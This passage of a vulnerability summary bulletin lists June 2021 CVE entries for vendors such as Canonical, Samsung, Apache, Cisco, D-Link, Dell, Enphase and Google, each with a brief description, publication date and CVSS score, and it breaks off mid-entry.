canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-17 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32553
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-16 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32552
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-15 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32551
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-14 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32550
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-13 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32549
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-8 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32548
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-lts package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32547
MISC
fooplugins — foogallery In the Best Image Gallery & Responsive Photo Gallery – FooGallery WordPress plugin before 2.0.35, the Custom CSS field of each gallery is not properly sanitised or validated before being output in the page where the gallery is embedded, leading to a stored Cross-Site Scripting issue. 2021-06-14 3.5 CVE-2021-24357
CONFIRM
google — android Improper caller check vulnerability in Knox Core prior to SMR MAY-2021 Release 1 allows attackers to install arbitrary app. 2021-06-11 3.6 CVE-2021-25388
MISC
MISC
google — android Improper running task check in S Secure prior to SMR MAY-2021 Release 1 allows attackers to use locked app without authentication. 2021-06-11 3.6 CVE-2021-25389
MISC
google — android Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to create executable kernel page outside code area. 2021-06-11 2.1 CVE-2021-25416
MISC
google — android Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to remap EL2 memory as writable. 2021-06-11 2.1 CVE-2021-25415
MISC
google — android Improper sanitization of incoming intent in Samsung Contacts prior to SMR JUN-2021 Release 1 allows local attackers to get permissions to access arbitrary data with Samsung Contacts privilege. 2021-06-11 2.1 CVE-2021-25413
MISC
google — android Improper sanitization of incoming intent in SecSettings prior to SMR MAY-2021 Release 1 allows local attackers to get permissions to access system uid data. 2021-06-11 2.1 CVE-2021-25393
MISC
MISC
google — android Improper access control of a component in CallBGProvider prior to SMR JUN-2021 Release 1 allows local attackers to access arbitrary files with an escalated privilege. 2021-06-11 3.6 CVE-2021-25410
MISC
google — android In /proc/net of the kernel filesystem, there is a possible information leak due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-9496886 2021-06-11 2.1 CVE-2019-9475
MISC
google — android In readVector of IMediaPlayer.cpp, there is a possible read of uninitialized heap data due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9, Android-10, Android-11, Android-8.1. Android ID: A-173720767 2021-06-11 2.1 CVE-2021-0484
MISC
google — android Intent redirection vulnerability in Secure Folder prior to SMR MAY-2021 Release 1 allows attackers to execute privileged action. 2021-06-11 2.1 CVE-2021-25391
MISC
MISC
google — android Improper protection of backup path configuration in Samsung Dex prior to SMR MAY-2021 Release 1 allows local attackers to get sensitive information via changing the path. 2021-06-11 2.1 CVE-2021-25392
MISC
MISC
google — android An improper access control vulnerability in TelephonyUI prior to SMR MAY-2021 Release 1 allows local attackers to write arbitrary files of telephony process via untrusted applications. 2021-06-11 2.1 CVE-2021-25397
MISC
MISC
google — android Improper address validation vulnerability in RKP api prior to SMR JUN-2021 Release 1 allows root privileged local attackers to write read-only kernel memory. 2021-06-11 2.1 CVE-2021-25411
MISC
google — android Improper access in Notification setting prior to SMR JUN-2021 Release 1 allows physically proximate attackers to set arbitrary notification via physically configuring device. 2021-06-11 2.1 CVE-2021-25409
MISC
google — android Intent redirection vulnerability in PhotoTable prior to SMR MAY-2021 Release 1 allows attackers to execute privileged action. 2021-06-11 1.9 CVE-2021-25390
MISC
MISC
samsung — bixby_voice Intent redirection vulnerability in Bixby Voice prior to version 3.1.12 allows attacker to access contacts. 2021-06-11 2.1 CVE-2021-25398
MISC
samsung — galaxy_watch_3_plugin Improper log management vulnerability in Galaxy Watch3 PlugIn prior to version 2.2.09.21033151 allows attacker with log permissions to leak Wi-Fi password connected to the user smartphone within log. 2021-06-11 2.1 CVE-2021-25421
MISC
samsung — galaxy_watch_plugin Improper log management vulnerability in Galaxy Watch PlugIn prior to version 2.2.05.21033151 allows attacker with log permissions to leak Wi-Fi password connected to the user smartphone within log. 2021-06-11 2.1 CVE-2021-25420
MISC
samsung — gear_s Information exposure vulnerability in Gear S Plugin prior to version 2.2.05.20122441 allows untrusted applications to access connected BT device information. 2021-06-11 3.3 CVE-2021-25406
MISC
samsung — watch_active2_plugin Improper log management vulnerability in Watch Active2 PlugIn prior to 2.2.08.21033151 version allows attacker with log permissions to leak Wi-Fi password connected to the user smartphone via log. 2021-06-11 2.1 CVE-2021-25423
MISC
samsung — watch_active_plugin Improper log management vulnerability in Watch Active PlugIn prior to version 2.2.07.21033151 allows attacker with log permissions to leak Wi-Fi password connected to the user smartphone within log. 2021-06-11 2.1 CVE-2021-25422
MISC

Severity Not Yet Assigned

Primary Vendor — Product   Description   Published   CVSS Score   Source & Patch Info
ubuntu — ubuntu It was discovered that the process_report() function in data/whoopsie-upload-all allowed arbitrary file writes via symlinks. 2021-06-12 not yet calculated CVE-2021-32557
MISC
74cms — 74cms SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. 2021-06-16 not yet calculated CVE-2020-22211
MISC
74cms — 74cms SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php. 2021-06-16 not yet calculated CVE-2020-22209
MISC
74cms — 74cms SQL Injection in 74cms 3.2.0 via the id parameter to wap/wap-company-show.php. 2021-06-16 not yet calculated CVE-2020-22212
MISC
74cms — 74cms SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php. 2021-06-16 not yet calculated CVE-2020-22208
MISC
74cms — 74cms SQL Injection in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. 2021-06-16 not yet calculated CVE-2020-22210
MISC
advantech — webaccess/scada Advantech WebAccess/SCADA Versions 9.0.1 and prior is vulnerable to redirection, which may allow an attacker to send a maliciously crafted URL that could result in redirecting a user to a malicious webpage. 2021-06-18 not yet calculated CVE-2021-32956
MISC
advantech — webaccess/scada Advantech WebAccess/SCADA Versions 9.0.1 and prior is vulnerable to a directory traversal, which may allow an attacker to remotely read arbitrary files on the file system. 2021-06-18 not yet calculated CVE-2021-32954
MISC
apache — chainsaw A deserialization flaw was found in Apache Chainsaw versions prior to 2.1.0 which could lead to malicious code execution. 2021-06-16 not yet calculated CVE-2020-9493
MISC
MLIST
MLIST
apache — cxf A vulnerability in the JsonMapObjectReaderWriter of Apache CXF allows an attacker to submit malformed JSON to a web service, which results in the thread getting stuck in an infinite loop, consuming CPU indefinitely. This issue affects Apache CXF versions prior to 3.4.4; Apache CXF versions prior to 3.3.11. 2021-06-16 not yet calculated CVE-2021-30468
CONFIRM
MLIST
MLIST
MLIST
MLIST
apache — http_server Apache HTTP Server protocol handler for the HTTP/2 protocol checks received request headers against the size limitations as configured for the server and used for the HTTP/1 protocol as well. On violation of these restrictions an HTTP response is sent to the client with a status code indicating why the request was rejected. This rejection response was not fully initialised in the HTTP/2 protocol handler if the offending header was the very first one received or appeared in a footer. This led to a NULL pointer dereference on initialised memory, crashing reliably the child process. Since such a triggering HTTP/2 request is easy to craft and submit, this can be exploited to DoS the server. This issue affected mod_http2 1.15.17 and Apache HTTP Server version 2.4.47 only. Apache HTTP Server 2.4.47 was never released. 2021-06-15 not yet calculated CVE-2021-31618
MISC
MISC
MLIST
MLIST
MLIST
FEDORA
FEDORA
apache — pdfbox In Apache PDFBox, a carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions. 2021-06-12 not yet calculated CVE-2021-31812
MISC
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
apache — pdfbox In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions. 2021-06-12 not yet calculated CVE-2021-31811
MISC
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
apollos_apps — apollos_apps Apollos Apps is an open source platform for launching church-related apps. In Apollos Apps versions prior to 2.20.0, new user registrations are able to access anyone’s account by only knowing their basic profile information (name, birthday, gender, etc). This includes all app functionality within the app, as well as any authenticated links to Rock-based webpages (such as giving and events). There is a patch in version 2.20.0. As a workaround, one can patch one’s server by overriding the `create` data source method on the `People` class. 2021-06-16 not yet calculated CVE-2021-32691
MISC
MISC
CONFIRM
bandai — namco_fromsoftware_dark_souls_iii Bandai Namco FromSoftware Dark Souls III allows remote attackers to execute arbitrary code. 2021-06-15 not yet calculated CVE-2021-34170
MISC
bosch — multiple_products A use after free in hermes, while emitting certain error messages, prior to commit d86e185e485b6330216dee8e854455c694e3a36e allows attackers to potentially execute arbitrary code via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, most React Native applications are not affected. 2021-06-15 not yet calculated CVE-2021-24037
CONFIRM
CONFIRM
bosch — multiple_products When using http protocol, the user password is transmitted as a clear text parameter for which it is possible to be obtained by an attacker through a MITM attack. This will be fixed starting from Firmware version 3.11.5, which will be released on the 30th of June, 2021. 2021-06-18 not yet calculated CVE-2021-23846
CONFIRM
bosch — multiple_products This vulnerability could allow an attacker to hijack a session while a user is logged in the configuration web page. This vulnerability was discovered by a security researcher in B426 and found during internal product tests in B426-CN/B429-CN, and B426-M and has been fixed already starting from version 3.08 on, which was released on June 2019. 2021-06-18 not yet calculated CVE-2021-23845
CONFIRM
captive_portal — captive_portal An authenticated Stored XSS (Cross-site Scripting) exists in the “captive.cgi” Captive Portal via the “Title of Login Page” text box or “TITLE” parameter in IPFire 2.21 (x86_64) – Core Update 130. It allows an authenticated WebGUI user with privileges to execute Stored Cross-site Scripting in the Captive Portal page. 2021-06-17 not yet calculated CVE-2020-19202
MISC
MISC
checksec — canopy CheckSec Canopy before 3.5.2 allows XSS attacks against the login page via the LOGIN_PAGE_DISCLAIMER parameter. 2021-06-18 not yet calculated CVE-2021-34815
MISC
MISC
MISC
cisco — advanced_malware_protection A vulnerability in the Cisco Advanced Malware Protection (AMP) for Endpoints integration of Cisco AsyncOS for Cisco Email Security Appliance (ESA) and Cisco Web Security Appliance (WSA) could allow an unauthenticated, remote attacker to intercept traffic between an affected device and the AMP servers. This vulnerability is due to improper certificate validation when an affected device establishes TLS connections. A man-in-the-middle attacker could exploit this vulnerability by sending a crafted TLS packet to an affected device. A successful exploit could allow the attacker to spoof a trusted host and then extract sensitive information or alter certain API requests. 2021-06-16 not yet calculated CVE-2021-1566
CISCO
cisco — anyconnect_secure_mobility_client A vulnerability in the DLL loading mechanism of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL hijacking attack on an affected device if the VPN Posture (HostScan) Module is installed on the AnyConnect client. This vulnerability is due to a race condition in the signature verification process for DLL files that are loaded on an affected device. An attacker could exploit this vulnerability by sending a series of crafted interprocess communication (IPC) messages to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected device with SYSTEM privileges. To exploit this vulnerability, the attacker must have valid credentials on the Windows system. 2021-06-16 not yet calculated CVE-2021-1567
CISCO
cisco — anyconnect_secure_mobility_client A vulnerability in Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to cause a denial of service (DoS) condition on an affected system. This vulnerability is due to uncontrolled memory allocation. An attacker could exploit this vulnerability by copying a crafted file to a specific folder on the system. A successful exploit could allow the attacker to crash the VPN Agent service when the affected application is launched, causing it to be unavailable to all users of the system. To exploit this vulnerability, the attacker must have valid credentials on a multiuser Windows system. 2021-06-16 not yet calculated CVE-2021-1568
CISCO
cisco — jabber Multiple vulnerabilities in Cisco Jabber for Windows, Cisco Jabber for Mac, and Cisco Jabber for mobile platforms could allow an attacker to access sensitive information or cause a denial of service (DoS) condition. For more information about these vulnerabilities, see the Details section of this advisory. 2021-06-16 not yet calculated CVE-2021-1570
CISCO
cisco — jabber Multiple vulnerabilities in Cisco Jabber for Windows, Cisco Jabber for Mac, and Cisco Jabber for mobile platforms could allow an attacker to access sensitive information or cause a denial of service (DoS) condition. For more information about these vulnerabilities, see the Details section of this advisory. 2021-06-16 not yet calculated CVE-2021-1569
CISCO
cisco — meeting_server A vulnerability in the API of Cisco Meeting Server could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability exists because requests that are sent to the API are not properly validated. An attacker could exploit this vulnerability by sending a malicious request to the API. A successful exploit could allow the attacker to cause all participants on a call to be disconnected, resulting in a DoS condition. 2021-06-16 not yet calculated CVE-2021-1524
CISCO
cisco — small_business_220_series_smart_switches Multiple vulnerabilities in the web-based management interface of Cisco Small Business 220 Series Smart Switches could allow an attacker to do the following: hijack a user session; execute arbitrary commands as a root user on the underlying operating system; conduct a cross-site scripting (XSS) attack; conduct an HTML injection attack. For more information about these vulnerabilities, see the Details section of this advisory. 2021-06-16 not yet calculated CVE-2021-1543
CISCO
cisco — small_business_220_series_smart_switches Multiple vulnerabilities in the web-based management interface of Cisco Small Business 220 Series Smart Switches could allow an attacker to do the following: hijack a user session; execute arbitrary commands as a root user on the underlying operating system; conduct a cross-site scripting (XSS) attack; conduct an HTML injection attack. For more information about these vulnerabilities, see the Details section of this advisory. 2021-06-16 not yet calculated CVE-2021-1542
CISCO
cisco — small_business_220_series_smart_switches Multiple vulnerabilities in the web-based management interface of Cisco Small Business 220 Series Smart Switches could allow an attacker to do the following: hijack a user session; execute arbitrary commands as a root user on the underlying operating system; conduct a cross-site scripting (XSS) attack; conduct an HTML injection attack. For more information about these vulnerabilities, see the Details section of this advisory. 2021-06-16 not yet calculated CVE-2021-1571
CISCO
cisco — small_business_220_series_smart_switches
Multiple vulnerabilities in the web-based management interface of Cisco Small Business 220 Series Smart Switches could allow an attacker to do the following: hijack a user session; execute arbitrary commands as a root user on the underlying operating system; conduct a cross-site scripting (XSS) attack; conduct an HTML injection attack. For more information about these vulnerabilities, see the Details section of this advisory. 2021-06-16 not yet calculated CVE-2021-1541
CISCO
cisco — unified_intelligence_center
A vulnerability in the web-based management interface of Cisco Unified Intelligence Center could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. 2021-06-16 not yet calculated CVE-2021-1395
CISCO
citrix — adc_and_netscaler_gateway
Citrix ADC and Citrix/NetScaler Gateway 13.0 before 13.0-76.29, 12.1-61.18, 11.1-65.20, Citrix ADC 12.1-FIPS before 12.1-55.238, and Citrix SD-WAN WANOP Edition before 11.4.0, 11.3.2, 11.3.1a, 11.2.3a, 11.1.2c, 10.2.9a suffers from uncontrolled resource consumption by way of a network-based denial-of-service from within the same Layer 2 network segment. Note that the attacker must be in the same Layer 2 network segment as the vulnerable appliance. 2021-06-16 not yet calculated CVE-2020-8299
MISC
citrix — adc_and_netscaler_gateway
Citrix ADC and Citrix/NetScaler Gateway before 13.0-82.41, 12.1-62.23, 11.1-65.20 and Citrix ADC 12.1-FIPS before 12.1-55.238 suffer from improper access control allowing SAML authentication hijack through a phishing attack to steal a valid user session. Note that Citrix ADC or Citrix Gateway must be configured as a SAML SP or a SAML IdP for this to be possible. 2021-06-16 not yet calculated CVE-2020-8300
MISC
citrix — cloud_connector
Citrix Cloud Connector before 6.31.0.62192 suffers from insecure storage of sensitive information due to sensitive information being stored in the Citrix Cloud Connector installation log files. Such information could be used by a malicious actor to access a Citrix Cloud environment. This issue affects all versions of Citrix Cloud Connector that were installed by passing secure client parameters for installation via the command line. The issue does not affect Citrix Cloud Connector if it was installed using the interactive installer or where a parameter file was used with the command-line installer. 2021-06-16 not yet calculated CVE-2021-22914
MISC
civicrm — civicrm
In CiviCRM before 5.21.3 and 5.22.x through 5.24.x before 5.24.3, users may be able to upload and execute a crafted PHAR archive. 2021-06-17 not yet calculated CVE-2020-36388
MISC
civicrm — civicrm
In CiviCRM before 5.28.1 and CiviCRM ESR before 5.27.5 ESR, the CKEditor configuration form allows CSRF. 2021-06-17 not yet calculated CVE-2020-36389
MISC
cleo — lexicom
An issue was discovered in Cleo LexiCom 5.5.0.0. The requirement for the sender of an AS2 message to identify themselves (via encryption and signing of the message) can be bypassed by changing the Content-Type of the message to text/plain. 2021-06-18 not yet calculated CVE-2021-33577
MISC
MISC
cleo — lexicom
An issue was discovered in Cleo LexiCom 5.5.0.0. Within the AS2 message, the sender can specify a filename. This filename can include path-traversal characters, allowing the file to be written to an arbitrary location on disk. 2021-06-18 not yet calculated CVE-2021-33576
MISC
MISC
connectwise — automate
An issue was discovered in ConnectWise Automate before 2021.5. A blind SQL injection vulnerability exists in core agent inventory communication that can enable an attacker to extract database information or administrative credentials from an instance via crafted monitor status responses. 2021-06-17 not yet calculated CVE-2021-32582
MISC
MISC
MISC
contiki-ng — contiki-ng
Contiki-NG is an open-source, cross-platform operating system for internet of things devices. A buffer overflow vulnerability exists in Contiki-NG versions prior to 4.6. After establishing a TCP socket using the tcp-socket library, it is possible for the remote end to send a packet with a data offset that is unvalidated. The problem has been patched in Contiki-NG 4.6. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 not yet calculated CVE-2021-21281
MISC
CONFIRM
contiki-ng — contiki-ng
Contiki-NG is an open-source, cross-platform operating system for internet of things devices. In versions prior to 4.5, a buffer overflow can be triggered by an input packet when using either of Contiki-NG’s two RPL implementations in source-routing mode. The problem has been patched in Contiki-NG 4.5. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 not yet calculated CVE-2021-21282
MISC
CONFIRM
contiki-ng — contiki-ng
Contiki-NG is an open-source, cross-platform operating system for internet of things devices. It is possible to cause an out-of-bounds write in versions of Contiki-NG prior to 4.6 when transmitting a 6LoWPAN packet with a chain of extension headers. Unfortunately, the written header is not checked to be within the available space, thereby making it possible to write outside the buffer. The problem has been patched in Contiki-NG 4.6. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 not yet calculated CVE-2021-21280
MISC
CONFIRM
contiki-ng — contiki-ng
Contiki-NG is an open-source, cross-platform operating system for internet of things devices. In versions prior to 4.6, an attacker can perform a denial-of-service attack by triggering an infinite loop in the processing of IPv6 neighbor solicitation (NS) messages. This type of attack can effectively shut down the operation of the system because of the cooperative scheduling used for the main parts of Contiki-NG and its communication stack. The problem has been patched in Contiki-NG 4.6. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 not yet calculated CVE-2021-21279
CONFIRM
contiki-ng — contiki-ng
Contiki-NG is an open-source, cross-platform operating system for internet of things devices. The RPL-Classic and RPL-Lite implementations in the Contiki-NG operating system versions prior to 4.6 do not validate the address pointer in the RPL source routing header. This makes it possible for an attacker to cause out-of-bounds writes with packets injected into the network stack. Specifically, the problem lies in the rpl_ext_header_srh_update function in the two rpl-ext-header.c modules for RPL-Classic and RPL-Lite respectively. The addr_ptr variable is calculated using an unvalidated CMPR field value from the source routing header. An out-of-bounds write can be triggered on line 151 in os/net/routing/rpl-lite/rpl-ext-header.c and line 261 in os/net/routing/rpl-classic/rpl-ext-header.c, which contain the following memcpy call with addr_ptr as destination. The problem has been patched in Contiki-NG 4.6. Users can apply a patch out-of-band as a workaround. 2021-06-18 not yet calculated CVE-2021-21257
MISC
CONFIRM
contiki-ng — contiki-ng
Contiki-NG is an open-source, cross-platform operating system for Next-Generation IoT devices. An out-of-bounds read can be triggered by 6LoWPAN packets sent to devices running Contiki-NG 4.6 and prior. The IPv6 header decompression function (`uncompress_hdr_iphc`) does not perform proper boundary checks when reading from the packet buffer. Hence, it is possible to construct a compressed 6LoWPAN packet that will read more bytes than what is available from the packet buffer. As of time of publication, there is not a release with a patch available. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 not yet calculated CVE-2021-21410
CONFIRM
MISC
curl — curl
curl 7.7 through 7.76.1 suffers from an information disclosure when the `-t` command line option, known as `CURLOPT_TELNETOPTIONS` in libcurl, is used to send variable=content pairs to TELNET servers. Due to a flaw in the option parser for sending NEW_ENV variables, libcurl could be made to pass on uninitialized data from a stack based buffer to the server, resulting in potentially revealing sensitive internal information to the server using a clear-text network protocol. 2021-06-11 not yet calculated CVE-2021-22898
MISC
MISC
MISC
MLIST
d-link — dir-2640-us
D-Link DIR-2640-US 1.01B04 is vulnerable to Buffer Overflow. There are multiple out-of-bounds vulnerabilities in some processes of D-Link AC2600(DIR-2640). Local ordinary users can overwrite global variables in the .bss section, causing the process to crash or altering its behavior. 2021-06-16 not yet calculated CVE-2021-34201
MISC
MISC
MISC
MISC
d-link — dir-2640-us
D-Link DIR-2640-US 1.01B04 is vulnerable to Incorrect Access Control. When PPPoE is configured, the router (AC2600, DIR-2640-US) starts a quagga process that listens on the whole network, and this service uses the original default password and port. An attacker can easily use telnet to log in, modify routing information, monitor the traffic of all devices behind the router, hijack DNS, and carry out phishing attacks. In addition, this interface is likely to be regarded by customers as a backdoor, because the interface should not be exposed. 2021-06-16 not yet calculated CVE-2021-34203
MISC
MISC
MISC
MISC
d-link — dir-2640-us
There are multiple out-of-bounds vulnerabilities in some processes of D-Link AC2600(DIR-2640) 1.01B04. Ordinary user permissions can be elevated to administrator permissions, resulting in local arbitrary code execution. An attacker could chain this with other vulnerabilities to achieve remote code execution. 2021-06-16 not yet calculated CVE-2021-34202
MISC
MISC
MISC
MISC
d-link — dir-2640-us
D-Link DIR-2640-US 1.01B04 is affected by Insufficiently Protected Credentials. D-Link AC2600(DIR-2640) stores the device system account password in plain text. It does not use Linux user management. In addition, the passwords of all devices are the same, and they cannot be modified by normal users. An attacker can easily log in to the target router through the serial port and obtain root privileges. 2021-06-16 not yet calculated CVE-2021-34204
MISC
MISC
MISC
MISC
db2 — db2
Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1.4 and 11.5.5 is vulnerable to a denial of service as the server terminates abnormally when executing a specially crafted SELECT statement. IBM X-Force ID: 200658. 2021-06-16 not yet calculated CVE-2021-29702
XF
CONFIRM
dedecms — dedecms
SQL Injection vulnerability in DedeCMS 5.7 via mdescription parameter to member/ajax_membergroup.php. 2021-06-16 not yet calculated CVE-2020-22198
MISC
MISC
dell — poweredge
Dell PowerEdge R640, R740, R740XD, R840, R940, R940xa, MX740c, MX840c, and T640 Server BIOS contain a stack-based buffer overflow vulnerability in systems with NVDIMM-N installed. A local malicious user with high privileges may potentially exploit this vulnerability, leading to a denial of service, arbitrary code execution, or information disclosure in UEFI or BIOS Preboot Environment. 2021-06-14 not yet calculated CVE-2021-21556
CONFIRM
dell — poweredge
Dell PowerEdge R640, R740, R740XD, R840, R940, R940xa, MX740c, MX840c, and T640 Server BIOS contain a heap-based buffer overflow vulnerability in systems with NVDIMM-N installed. A local malicious user with high privileges may potentially exploit this vulnerability, leading to a denial of service, arbitrary code execution, or information disclosure in UEFI or BIOS Preboot Environment. 2021-06-14 not yet calculated CVE-2021-21555
CONFIRM
dell — poweredge
Dell PowerEdge R640, R740, R740XD, R840, R940, R940xa, MX740c, MX840c, and Dell Precision 7920 Rack Workstation BIOS contain a stack-based buffer overflow vulnerability in systems with Intel Optane DC Persistent Memory installed. A local malicious user with high privileges may potentially exploit this vulnerability, leading to a denial of service, arbitrary code execution, or information disclosure in UEFI or BIOS Preboot Environment. 2021-06-14 not yet calculated CVE-2021-21554
CONFIRM
dell — poweredge_server_bios_and_precision_rack_bios
Dell PowerEdge Server BIOS and select Dell Precision Rack BIOS contain an out-of-bounds array access vulnerability. A local malicious user with high privileges may potentially exploit this vulnerability, leading to a denial of service, arbitrary code execution, or information disclosure in System Management Mode. 2021-06-14 not yet calculated CVE-2021-21557
CONFIRM
ecshop — ecshop
SQL Injection in ECShop 3.0 via the id parameter to admin/shophelp.php. 2021-06-16 not yet calculated CVE-2020-22205
MISC
ecshop — ecshop
SQL Injection in ECShop 3.0 via the aid parameter to admin/affiliate_ck.php. 2021-06-16 not yet calculated CVE-2020-22206
MISC
ecshop — ecshop
SQL Injection in ECShop 2.7.6 via the goods_number parameter to flow.php. 2021-06-16 not yet calculated CVE-2020-22204
MISC
eip — stack_group_opener
An information disclosure vulnerability exists in the Ethernet/IP UDP handler functionality of EIP Stack Group OpENer 2.3 and development commit 8c73bf3. A specially crafted network request can lead to an out-of-bounds read. 2021-06-17 not yet calculated CVE-2021-21777
MISC
elemin — elemin
Elemin allows remote attackers to upload and execute arbitrary PHP code via the Themify framework (before 1.2.2) wp-content/themes/elemin/themify/themify-ajax.php file. 2021-06-17 not yet calculated CVE-2013-20002
MISC
MISC
MISC
MISC
elfinder — elfinder
elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication. 2021-06-14 not yet calculated CVE-2021-32682
MISC
CONFIRM
enphase — envoy
An issue was discovered on Enphase Envoy R3.x and D4.x devices. There is a custom PAM module for user authentication that circumvents traditional user authentication. This module uses a password derived from the MD5 hash of the username and serial number. The serial number can be retrieved by an unauthenticated user at /info.xml. Attempts to change the user password via passwd or other tools have no effect. 2021-06-16 not yet calculated CVE-2020-25754
MISC
MISC
MISC
enphase — envoy
An issue was discovered on Enphase Envoy R3.x and D4.x devices with v3 software. The default admin password is set to the last 6 digits of the serial number. The serial number can be retrieved by an unauthenticated user at /info.xml. 2021-06-16 not yet calculated CVE-2020-25753
MISC
MISC
MISC
enphase — envoy
An issue was discovered on Enphase Envoy R3.x and D4.x devices. There are hardcoded web-panel login passwords for the installer and Enphase accounts. The passwords for these accounts are hardcoded values derived from the MD5 hash of the username and serial number mixed with some static strings. The serial number can be retrieved by an unauthenticated user at /info.xml. These passwords can be easily calculated by an attacker; users are unable to change these passwords. 2021-06-16 not yet calculated CVE-2020-25752
MISC
MISC
MISC
enphase — envoy
An issue was discovered on Enphase Envoy R3.x and D4.x (and other current) devices. The upgrade_start function in /installer/upgrade_start allows remote authenticated users to execute arbitrary commands via the force parameter. 2021-06-16 not yet calculated CVE-2020-25755
MISC
MISC
MISC
excellent_infotek_corporation — e-document_system
An issue was discovered in EXCELLENT INFOTEK CORPORATION (EIC) E-document System 3.0. A remote attacker can use kw/auth/bbs/asp/get_user_email_info_bbs.asp to obtain the contact information (name and e-mail address) of everyone in the entire organization. This information can allow remote attackers to perform social engineering or brute force attacks against the system login page. 2021-06-16 not yet calculated CVE-2021-34683
MISC
MISC
fiyo — cms
In Fiyo CMS 2.0.6.1, the ‘tag’ parameter results in an unauthenticated XSS attack. 2021-06-17 not yet calculated CVE-2020-35373
MISC
fogproject — fogproject
FOGProject v1.5.9 is affected by a File Upload RCE (Authenticated). 2021-06-16 not yet calculated CVE-2021-32243
MISC
foxit — phantompdf
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 10.1.3.37598. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of XFA templates. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13531. 2021-06-16 not yet calculated CVE-2021-31476
MISC
MISC
ge — reason_rpv311
This vulnerability allows remote attackers to execute arbitrary code on affected installations of GE Reason RPV311 14A03. Authentication is not required to exploit this vulnerability. The specific flaw exists within the firmware and filesystem of the device. The firmware and filesystem contain hard-coded default credentials. An attacker can leverage this vulnerability to execute code in the context of the download user. Was ZDI-CAN-11852. 2021-06-16 not yet calculated CVE-2021-31477
MISC
MISC
google — android
In Chromecast bootROM, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege in the bootloader, with physical USB access, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-174490700 2021-06-14 not yet calculated CVE-2021-0467
MISC
google — android
Product: Android. Versions: Android SoC. Android ID: A-175402462 2021-06-14 not yet calculated CVE-2021-0324
MISC
google — chrome
Use after free in Autofill in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 not yet calculated CVE-2021-30546
MISC
MISC
google — chrome
Use after free in BFCache in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 not yet calculated CVE-2021-30544
MISC
MISC
google — chrome
Use after free in Extensions in Google Chrome prior to 91.0.4472.101 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 not yet calculated CVE-2021-30545
MISC
MISC
google — chrome
